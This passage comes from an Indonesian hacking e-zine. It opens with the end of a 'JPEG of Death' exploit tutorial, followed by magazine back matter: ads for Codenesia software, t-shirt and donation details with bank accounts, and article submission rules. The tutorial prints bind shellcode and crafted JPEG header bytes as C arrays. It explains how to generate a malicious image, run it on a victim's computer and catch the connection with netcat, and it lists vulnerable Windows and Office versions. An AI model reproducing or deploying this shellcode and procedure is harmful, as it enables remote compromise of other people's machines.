char bind_shellcode[] = "\xD9\xE1\xD9\x34\x24\x58\x58\x58" "\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\x97\xFE\x80\x30\x92\x40\xE2" "\xFA\x7A\xAA\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB\x54\xEB\x77\xDB" "\x14\xDB\x36\x3F\xBC\x7B\x36\x88\xE2\x55\x4B\x9B\x67\x3F\x59\x7F" "\x6E\xA9\x1C\xDC\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C" "\x21\x84\xC5\xC1\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6" "\x1B\x77\x1B\xCF\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2" "\x8E\x3F\x19\xCA\x9A\x79\x9E\x1F\xC5\xBE\xC3\xC0\x6D\x42\x1B\x51" "\xCB\x79\x82\xF8\x9A\xCC\x93\x7C\xF8\x98\xCB\x19\xEF\x92\x12\x6B" "\x94\xE6\x76\xC3\xC1\x6D\xA6\x1D\x7A\x07\x92\x92\x92\xCB\x1B\x96" "\x1C\x70\x79\xA3\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92" "\x6D\xC7\xB2\xC5\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x8E\x1B\x51" "\xA3\x6D\xC5\xC5\xFA\x90\x92\x83\xCE\x1B\x74\xF8\x82\xC4\xC1\x6D" "\xC7\x8A\xC5\xC1\x6D\xC7\x86\xC5\xC4\xC1\x6D\xC7\x82\x1B\x50\xF4" "\x13\x7E\xC6\x92\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x1B\x45" "\x54\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xEE\xB6\xDA" "\x1B\xEE\xB6\xDE\x1B\xEE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3" "\xC3\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xA2\x1B\x73\x79" "\x9C\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xBE\xC5\x6D\xC7\x9E\x6D" "\xC7\xBA\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97" "\xEA\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6" "\x19\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F"

63

"\x93\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4" "\x19\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3" "\x52\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";

char header1[] = "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64" "\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00" "\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65" "\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19" "\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26" "\x2E\x3E\x35\x35\x35\x35\x35\x3E";

char setNOPs1[] = "\xE8\x00\x00\x00\x00\x5B\x8D\x8B" "\x00\x05\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8";

/…….kode dipotong sebagian……./ Buka cmd dan arahkan ke folder tempat kita nyimpen file .jpeg dan JpegOf Death tadi,dan kita ketikkan jpegofdeath.exe –r -p <port yang digunakan>

64

Trus kita buka folder tempat kita naruh file tadi,akan kita dapati file baru disana < pada contoh ini nama file gambarnya adalah tes.jpeg,file exploit yang tercipta adalah test.jpeg>,itu yang akan kita jalankan di kompie korban…

Setelah file dijalankan di kompie korban,maka akan terjadi crash dan kita bisa jalankan program netcat di kompie kita dengan perintah nc –l –p <port setingan kita tadi> dan menunggu koneksi dari korban,sayangnya pada saat ane membuat tutorial ini,rata-rata korban dah di patch bugs nya… sekedar bocoran,exploit ini efektif pada:  Microsoft Windows Xp dan Microsoft windows Xp service pack 1  Microsoft Windows Xp 64-Bit Edition service pack 1  Microsoft Windows Xp 64-Bit Edition Version 2003  Microsoft Windows Server™ 2003  Microsoft Windows Server 2003 64-bit edition  Microsoft Office Xp service pack 3  Microsoft Office Xp service pack 2  Microsoft Office Xp software o Outlook®2002 o Word 2002 o Excel2002 o Power point® 2002

65

o Frontpage® 2002 o Publisher 2002 o Access 2002 Dan yang lainnya bisa dicoba sendiri yaa :p Sekian tutorial dari ane,bila ada salah kata mohon dimaapin ya temen-temen 

Semua

kritik.saran,sumpah

serapah,caci

maki,ucapan

cinta

:p

bisa

di

kirim

ke

[email protected]

Greetzz: J0ck3r A.K.A Bocah petualang A.K.A D4IV4IVK

Thanks to Allah Swt║Muhammad SAW║My Father║My Mother║XCode║Codenesia║Jasakom║BorneoCrew||All people

66

Produk Codenesia Codenesia Malware Cleaner (CMC)

Kami juga mengembangkan produk Antivirus local yang kami beri nama CMC atau kependekan dari Codenesia Malware Cleaner yang tidak hanya dapat membasmi virus local namun juga sanggup membasmi beberapa virus asing secara tuntas, diman ketika majalah ini terbit versi terkahir dari CMC adalah PH 3.5 yang bisa anda unduh di website kami secara gratis. Download CMC PH.3 build.5: http://codenesia.com/system/files/CMC%20PH%25233.5.zip

Rax File Arciver (RaX)

RaX adalah Archiver program seperti Winrar, WinZip atau 7z, namun punya ektensi .rax. RaX adalah produk pertama codenesia, yang bisa anda unduh di website codenesia atau di alamat hirin.4shared.com pada folder Rax.

CT File Recovery Sebuah produk software baru dari Codenesia yang berfungsi untuk recovery data kususnya data pada drive NTFS. Seperti produk sebelumnya software ini bersifat gratis, diharapkan software recovery data ini dapat bermanfaat kususnya bagi para member Codenesia dan masyarakat IT Indonesia. Software ini dibuat hasil kerja sama Codenesia dengan PH Tech Security and System Solution. http://codenesia.com/system/files/CT%20File%20Recovery.zip

67

Kaos Codenesia

Harga Kaos : Rp. 50.000,- (belum ongkir) Ukuran M (TB: 155-162 cm) Ukuran L (TB: 162-180 cm) Ukuran XL (TB: 162-180 cm + badan lebar) Cara Pesan: Tanyakan stok ukuran yang anda pesan ke sdr. A.M Hirin ([email protected]). Jika stock ready maka transfer uang sesuai harga+ongkir ke (salah satu) nomor rekening berikut : Bank BRI: BRI CAB. KENDAL a.n AHMAD MUTOHIRIN rek. 0034.0102.7031.504

68

Bank BCA: KCP. Gatot Subroto(semarang) a.n AHMAD MUTOHIRIN rek. 796.024.9652

Foto/Scan bukti transfer lalu kirimkan ke alamat email [email protected] Dan kirimkan alamat lengkap rumah anda (tujuan pengiriman kaos).

Menghitung Ongkos Kirim:

Untuk mengetahui ongkos kirim ke kota atau wilayah anda, silahkan kunjungi: http://www.posindonesia.co.id/tarifdn.php

Kota Asal

: Kendal

Kota Tujuan : Sesuai Kota Anda Berat

: 400 grm (per kaos)

Lihat harga yang muncul untuk POS KILAT KHUSUS Buruan stock terbatas !!!

69

BOOKS FOR SALE Buku karya A.M Hirin dan Anharku

70

Thanks To All Partner Of Codenesia

Join Codenesia Group on Facebook !!! Facebook Group Codenesia : http://www.facebook.com/pages/Codenesia-Group/160779392622?ref=ts

71

Donasi

Codenesia membuka donasi dari teman-teman semua khususnya member Codenesia. Dibukanya link donasi ini bertujuan untuk memajukan Codenesia. donasikan uang anda dengan sukarela melalui :

Bank Mandiri Nomor Rekening : 1370006515049 Atas Nama: Anjar Fiandrianto

NB: Setelah mengirimkan donasi ke nomor rekening tersebut harap konfirmasi ke YM ajrnea (a.fiandri) atau email ke [email protected]

Penggunaan donasi: 1. Donasi digunakan untuk domain 2. Donasi digunakan untuk hosting 3. Donasi digunakan untuk memajukan Codenesia.

Atas donasi dari teman-teman, khususnya member Codenesia, kami mengucapkan banyak terima kasih.

salam Admin

72

Cara Kirim Artikel Untuk Cn-Zine Edisi Berikutnya Isi materi artikel:  Kategori Pemograman  Kategori Hacking  Kategori Cracking  Kategori Antivirus  Kategori Virus  Kategori Etc (All of Komputer)

Catatan: isi materi diharapkan Original (tidak KOPi PASte), tidak ada unsur penghinaan, tidak mengandung SARA’, artikel yang masuk akan di seleksi terlebih dahulu oleh redaksi CN-Zine. Kirimkan tulisan anda dengan format sebagai berikut:  Filetype

: .Doc

 Page Setup : Paper size =A4  Line spacing : 1,5 Lines  Font

: Times New Roman , size Judul Cambria = 16 (Heading1) dan paragraph = 12

Jika ada Source Code atau Tool yang disertakan kirim dalam bentuk RAR,ZIP, atau RaX. Kirimkan tulisan anda ke Redaksi [email protected]

Redaksi Email

: [email protected]

Layouter : anharku Editor

: A.M Hirin

Cover

: hakz & anharku

73

“Berilah dukungan untuk Codenesia Magazine VOL #11 agar menjadi lebih baik lagi”.

CODENESIA Build Indonesia With Code

74

didownload secara gratis

Recommend Documents